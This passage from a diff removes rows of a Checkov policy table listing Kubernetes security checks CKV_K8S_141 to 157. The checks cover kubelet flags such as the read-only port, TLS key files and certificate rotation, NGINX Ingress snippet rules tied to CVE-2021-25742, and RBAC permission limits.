-| 3377 | CKV_K8S_141              | resource                         | Job                                                                                              | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3378 | CKV_K8S_141              | resource                         | Pod                                                                                              | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3379 | CKV_K8S_141              | resource                         | PodTemplate                                                                                      | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3380 | CKV_K8S_141              | resource                         | ReplicaSet                                                                                       | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3381 | CKV_K8S_141              | resource                         | ReplicationController                                                                            | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3382 | CKV_K8S_141              | resource                         | StatefulSet                                                                                      | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3383 | CKV_K8S_143              | resource                         | CronJob                                                                                          | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3384 | CKV_K8S_143              | resource                         | DaemonSet                                                                                        | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3385 | CKV_K8S_143              | resource                         | Deployment                                                                                       | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3386 | CKV_K8S_143              | resource                         | DeploymentConfig                                                                                 | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3387 | CKV_K8S_143              | resource                         | Job                                                                                              | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3388 | CKV_K8S_143              | resource                         | Pod                                                                                              | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3389 | CKV_K8S_143              | resource                         | PodTemplate                                                                                      | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3390 | CKV_K8S_143              | resource                         | ReplicaSet                                                                                       | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3391 | CKV_K8S_143              | resource                         | ReplicationController                                                                            | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3392 | CKV_K8S_143              | resource                         | StatefulSet                                                                                      | Ensure that the --streaming-connection-idle-timeout argument is not set to 0                                                                                                                             | Kubernetes              | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py)                                            |
-| 3393 | CKV_K8S_144              | resource                         | CronJob                                                                                          | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3394 | CKV_K8S_144              | resource                         | DaemonSet                                                                                        | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3395 | CKV_K8S_144              | resource                         | Deployment                                                                                       | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3396 | CKV_K8S_144              | resource                         | DeploymentConfig                                                                                 | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3397 | CKV_K8S_144              | resource                         | Job                                                                                              | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3398 | CKV_K8S_144              | resource                         | Pod                                                                                              | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3399 | CKV_K8S_144              | resource                         | PodTemplate                                                                                      | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3400 | CKV_K8S_144              | resource                         | ReplicaSet                                                                                       | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3401 | CKV_K8S_144              | resource                         | ReplicationController                                                                            | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3402 | CKV_K8S_144              | resource                         | StatefulSet                                                                                      | Ensure that the --protect-kernel-defaults argument is set to true                                                                                                                                        | Kubernetes              | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py)                                                              |
-| 3403 | CKV_K8S_145              | resource                         | CronJob                                                                                          | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3404 | CKV_K8S_145              | resource                         | DaemonSet                                                                                        | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3405 | CKV_K8S_145              | resource                         | Deployment                                                                                       | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3406 | CKV_K8S_145              | resource                         | DeploymentConfig                                                                                 | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3407 | CKV_K8S_145              | resource                         | Job                                                                                              | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3408 | CKV_K8S_145              | resource                         | Pod                                                                                              | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3409 | CKV_K8S_145              | resource                         | PodTemplate                                                                                      | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3410 | CKV_K8S_145              | resource                         | ReplicaSet                                                                                       | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3411 | CKV_K8S_145              | resource                         | ReplicationController                                                                            | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3412 | CKV_K8S_145              | resource                         | StatefulSet                                                                                      | Ensure that the --make-iptables-util-chains argument is set to true                                                                                                                                      | Kubernetes              | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py)                                                            |
-| 3413 | CKV_K8S_146              | resource                         | CronJob                                                                                          | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3414 | CKV_K8S_146              | resource                         | DaemonSet                                                                                        | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3415 | CKV_K8S_146              | resource                         | Deployment                                                                                       | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3416 | CKV_K8S_146              | resource                         | DeploymentConfig                                                                                 | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3417 | CKV_K8S_146              | resource                         | Job                                                                                              | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3418 | CKV_K8S_146              | resource                         | Pod                                                                                              | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3419 | CKV_K8S_146              | resource                         | PodTemplate                                                                                      | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3420 | CKV_K8S_146              | resource                         | ReplicaSet                                                                                       | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3421 | CKV_K8S_146              | resource                         | ReplicationController                                                                            | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3422 | CKV_K8S_146              | resource                         | StatefulSet                                                                                      | Ensure that the --hostname-override argument is not set                                                                                                                                                  | Kubernetes              | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py)                                                                        |
-| 3423 | CKV_K8S_147              | resource                         | CronJob                                                                                          | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3424 | CKV_K8S_147              | resource                         | DaemonSet                                                                                        | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3425 | CKV_K8S_147              | resource                         | Deployment                                                                                       | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3426 | CKV_K8S_147              | resource                         | DeploymentConfig                                                                                 | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3427 | CKV_K8S_147              | resource                         | Job                                                                                              | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3428 | CKV_K8S_147              | resource                         | Pod                                                                                              | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3429 | CKV_K8S_147              | resource                         | PodTemplate                                                                                      | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3430 | CKV_K8S_147              | resource                         | ReplicaSet                                                                                       | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3431 | CKV_K8S_147              | resource                         | ReplicationController                                                                            | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3432 | CKV_K8S_147              | resource                         | StatefulSet                                                                                      | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture                                                                                                      | Kubernetes              | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py)                                                                                  |
-| 3433 | CKV_K8S_148              | resource                         | CronJob                                                                                          | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3434 | CKV_K8S_148              | resource                         | DaemonSet                                                                                        | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3435 | CKV_K8S_148              | resource                         | Deployment                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3436 | CKV_K8S_148              | resource                         | DeploymentConfig                                                                                 | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3437 | CKV_K8S_148              | resource                         | Job                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3438 | CKV_K8S_148              | resource                         | Pod                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3439 | CKV_K8S_148              | resource                         | PodTemplate                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3440 | CKV_K8S_148              | resource                         | ReplicaSet                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3441 | CKV_K8S_148              | resource                         | ReplicationController                                                                            | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3442 | CKV_K8S_148              | resource                         | StatefulSet                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py)                                                            |
-| 3443 | CKV_K8S_149              | resource                         | CronJob                                                                                          | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3444 | CKV_K8S_149              | resource                         | DaemonSet                                                                                        | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3445 | CKV_K8S_149              | resource                         | Deployment                                                                                       | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3446 | CKV_K8S_149              | resource                         | DeploymentConfig                                                                                 | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3447 | CKV_K8S_149              | resource                         | Job                                                                                              | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3448 | CKV_K8S_149              | resource                         | Pod                                                                                              | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3449 | CKV_K8S_149              | resource                         | PodTemplate                                                                                      | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3450 | CKV_K8S_149              | resource                         | ReplicaSet                                                                                       | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3451 | CKV_K8S_149              | resource                         | ReplicationController                                                                            | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3452 | CKV_K8S_149              | resource                         | StatefulSet                                                                                      | Ensure that the --rotate-certificates argument is not set to false                                                                                                                                       | Kubernetes              | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py)                                                                      |
-| 3453 | CKV_K8S_151              | resource                         | CronJob                                                                                          | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3454 | CKV_K8S_151              | resource                         | DaemonSet                                                                                        | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3455 | CKV_K8S_151              | resource                         | Deployment                                                                                       | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3456 | CKV_K8S_151              | resource                         | DeploymentConfig                                                                                 | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3457 | CKV_K8S_151              | resource                         | Job                                                                                              | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3458 | CKV_K8S_151              | resource                         | Pod                                                                                              | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3459 | CKV_K8S_151              | resource                         | PodTemplate                                                                                      | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3460 | CKV_K8S_151              | resource                         | ReplicaSet                                                                                       | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3461 | CKV_K8S_151              | resource                         | ReplicationController                                                                            | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3462 | CKV_K8S_151              | resource                         | StatefulSet                                                                                      | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers                                                                                                                                   | Kubernetes              | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py)                                                                |
-| 3463 | CKV_K8S_152              | resource                         | Ingress                                                                                          | Prevent NGINX Ingress annotation snippets which contain LUA code execution. See CVE-2021-25742                                                                                                           | Kubernetes              | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py)                                                                |
-| 3464 | CKV_K8S_153              | resource                         | Ingress                                                                                          | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742                                                                                                                                        | Kubernetes              | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py)                                                |
-| 3465 | CKV_K8S_154              | resource                         | Ingress                                                                                          | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742                                                                                                              | Kubernetes              | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py)                                                            |
-| 3466 | CKV_K8S_155              | resource                         | ClusterRole                                                                                      | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations                                                                                                    | Kubernetes              | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py)                                                                                |
-| 3467 | CKV_K8S_156              | resource                         | ClusterRole                                                                                      | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests                                                                                                                       | Kubernetes              | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py)                                            |
-| 3468 | CKV_K8S_157              | resource                         | ClusterRole                                                                                      | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings                                                                                                       | Kubernetes              | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py)                                                                              |
